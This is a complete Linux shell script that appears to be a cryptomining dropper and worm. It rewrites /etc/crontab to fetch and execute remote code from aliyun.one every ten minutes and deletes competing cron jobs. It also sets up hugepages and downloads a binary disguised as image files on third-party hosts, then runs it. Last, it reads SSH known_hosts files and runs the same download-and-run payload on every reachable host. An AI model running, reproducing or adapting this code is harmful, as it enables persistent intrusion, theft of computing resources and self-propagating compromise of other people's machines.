

 "*/10 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print urllib.urlopen(\"http://aliyun.one\").read()')|sh"|
cat > /etc/crontab <<EOF
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin


*/10 * * * * root (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print urllib.urlopen("http://aliyun.one").read()'||/usr/local/sbin/1af91023c65502)|sh
EOF

if [ $(grep HugePages_Total /proc/meminfo |awk '{print $2}') -eq 0 ]; then
    sysctl -w vm.nr_hugepages=1180
fi
find /etc/cron*|xargs chattr -i
find /var/spool/cron*|xargs chattr -i
grep -RE "(wget|curl)" /etc/cron*|grep -v "aliyun.one"|cut -f 1 -d :|xargs rm -rf
grep -RE "(wget|curl)" /var/spool/cron*|grep -v "aliyun.one"|cut -f 1 -d :|xargs rm -rf

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
a64="img.sobot.com/chatres/89/msg/20191126/lsd/6ff4ba5d0de4498eb4590ce0bad0937f.png"
a32="img.sobot.com/chatres/89/msg/20191126/lsd/7070449033af431c9ab5a47d4b340110.png"
b64="cdn.xiaoduoai.com/cvd/dist/fileUpload/1574757109885/2.435321006460751.jpg"
b32="cdn.xiaoduoai.com/cvd/dist/fileUpload/1574757136920/7.1935036185885775.jpg"
c64="https://user-images.githubusercontent.com/56861392/69612350-785a8f00-106a-11ea-9687-cf812de97113.jpg"
c32="https://user-images.githubusercontent.com/56861392/69612387-8a3c3200-106a-11ea-9597-62c9c272b5be.jpg"
if [ ! -f "1af91023c65502" ]; then
    ARCH=$(getconf LONG_BIT)
    if [ ${ARCH}x = "64x" ]; then
        (curl -fsSL -m180 $a64 -o 1af91023c65502||wget -T180 -q $a64 -O 1af91023c65502||python -c 'import urllib;urllib.urlretrieve("http://'$a64'", "1af91023c65502")'||curl -fsSL -m180 $b64 -o 1af91023c65502||wget -T180 -q $b64 -O 1af91023c65502||python -c 'import urllib;urllib.urlretrieve("http://'$b64'", "1af91023c65502")'||curl -fsSL -m180 $c64 -o 1af91023c65502||wget -T180 -q $c64 -O 1af91023c65502||python -c 'import urllib;urllib.urlretrieve("'$c64'", "1af91023c65502")')  
    else
        (curl -fsSL -m180 $a32 -o 1af91023c65502||wget -T180 -q $a32 -O 1af91023c65502||python -c 'import urllib;urllib.urlretrieve("http://'$a32'", "1af91023c65502")'||curl -fsSL -m180 $b32 -o 1af91023c65502||wget -T180 -q $b32 -O 1af91023c65502||python -c 'import urllib;urllib.urlretrieve("http://'$b32'", "1af91023c65502")'||curl -fsSL -m180 $c32 -o 1af91023c65502||wget -T180 -q $c32 -O 1af91023c65502||python -c 'import urllib;urllib.urlretrieve("'$c32'", "1af91023c65502")')
    fi
fi
chmod +x 1af91023c65502
$(pwd)/1af91023c65502 || ./1af91023c65502 || /usr/bin/1af91023c65502 || /usr/libexec/1af91023c65502 || /usr/local/bin/1af91023c65502 || 1af91023c65502 || /tmp/1af91023c65502 || /usr/local/sbin/1af91023c65502
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print urllib.urlopen(\"http://aliyun.one\").read()')|sh >/dev/null 2>&1 &" & done
fi

for file in /home/*
do
    if test -d $file; then
        if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
            for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print urllib.urlopen(\"http://aliyun.one\").read()')|sh >/dev/null 2>&1 &" & done
        fi
    fi
done
